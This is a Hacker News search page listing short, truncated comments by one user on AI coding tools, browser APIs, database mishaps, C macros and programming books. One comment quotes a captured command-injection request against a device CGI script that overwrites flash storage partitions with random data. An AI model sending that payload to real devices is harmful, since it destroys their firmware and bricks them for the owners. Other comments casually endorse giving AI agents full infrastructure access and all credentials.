Y
HN Search
Hacker News Search
new
|
comments
|
top
|
jobs
catfood
searching Neon…
1.
▲
2.
▲
3.
▲
4.
▲
5.
▲
6.
▲
7 ms
·
1.
▲
by
catfood
29d ago
Letting it rip and give it full infra, db, dns, all the keys to the castle, drinking from a telemetry firehose the whole time, a huge tangled web of integrations that all kind of works. I think just offloading as much as possible is the sta
2.
▲
by
catfood
1mo ago
Practically free with any of the subscription plans.
3.
▲
by
catfood
1mo ago
>Auto-fix bugs and CI until green + thermonuclear review skill x3. Gotta love this loop, I have it running while I'm asleep all the time.
4.
▲
by
catfood
1mo ago
I can't relate. It's so nice for quickly going deep on a subject you're interested in. Who cares if you typed the code in plain English?
5.
▲
by
catfood
1mo ago
It would be fun to plop Claude Code down on a phone and play with the baseband processor.
6.
▲
by
catfood
5mo ago
>And Web Serial reached mainline Firefox last week. That's good news. I wish FF wasn't so conservative... they're missing a lot of cool APIs. Sometimes I wonder who they think their audience is. I suppose they would know b
7.
▲
by
catfood
6mo ago
One of the greatest texts ever written. Ok maybe just one of my favorites. I wouldn't mind a 2nd edition though... surely the system call interface has changed a bit since 2010.
8.
▲
by
catfood
7y ago
A bunch of different ways probably. This method is stolen from SO (works for Chrome): const detect = () => { var fs = window.RequestFileSystem || window.webkitRequestFileSystem; if (!fs) { console.log("FS check faile
9.
▲
by
catfood
8y ago
You're in luck, Divinity 2 runs perfectly for me on linux with Proton (with a little bit of work). Check protondb.com.
10.
▲
by
catfood
8y ago
Bisqwit: https://www.youtube.com/watch?v=eF9qWbuQLuw Also Professor Leonard but someone already mentioned him.
11.
▲
by
catfood
8y ago
I don't do anything special for prototyping, I just use what I normally do if I were creating the real thing. > django-admin startproject > copy+paste my webpack config for React > copy+paste my general management scripts into
12.
▲
by
catfood
8y ago
Yeah they must mean new accounts, if not then I'm lost. I guess it could have reset autoincrement but they said it didn't. The only other thing I can think of is that the signed token that's put in localStorage is sent to the
13.
▲
by
catfood
8y ago
The part of that that I don't get is how a new user could have the same ID as an old (truncated) user since "our system created new records for them, with primary keys generated from the existing sequence (PostgreSQL does not rese
14.
▲
by
catfood
8y ago
So the session keys mapped to usernames, rather than IDs in the database? Otherwise, when the database is restored with the old user IDs, the session would become invalid instead of continuing to work. This is what I'm seeing: 1. Table
15.
▲
by
catfood
8y ago
"Some 55,000 devices were affected in the United States and 14,000 in China, and Iran's share of affected devices was 2 percent," Azari-Jahromi was quoted as saying. Pretty misleading headline.
16.
▲
by
catfood
9y ago
That's how it should be done yeah. Developers on Windows seem to be really loose in their use of TCP or UDP for IPC. Even my mouse driver opens up a port on 0.0.0.0.
17.
▲
by
catfood
9y ago
The Linux Programming Interface is my favorite software book of all time. I had a problem that I think a lot of other people had, where I learned C the language pretty in depth, but didn't really know what to do with it until I read th
18.
▲
by
catfood
9y ago
Check this one out: 'GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=(cat%20/dev/urandom%20%3e/dev/mtdblock3%20%26);(cat%20/dev/urandom%20%3e/dev/mtdblock4%20%26);(cat%20/dev&#
19.
▲
by
catfood
10y ago
Does kaspersky AV also keep a DNS cache? That would be convenient.
20.
▲
by
catfood
10y ago
Eastern Europe eats a lot of potatoes. Onion = Onion Router
21.
▲
by
catfood
10y ago
The point of the bootcamp is the job you get after it's over. I imagine bootcamps make deals with the local tech companies to direct the grads to them, so the bootcamp can boast high hiring rates, and the tech companies gets devs for c
22.
▲
by
catfood
10y ago
UPDATE email SET deleted = 1 WHERE uuid = '3b431dc020cc404b8bbea290e91b9865';
23.
▲
by
catfood
12y ago
He worked at Sun Microsystems. His time there inspired a lot of Office Space apparently. https://www.youtube.com/watch?v=ylnMb6niDJ0
24.
▲
by
catfood
13y ago
Might be obvious to some of you, but I use this to check what my macros expand out into to make sure the syntax is valid. #include <stdio.h> #define atoa(x) #x #define mdb(x) printf("%s\n", atoa(x)) #define swap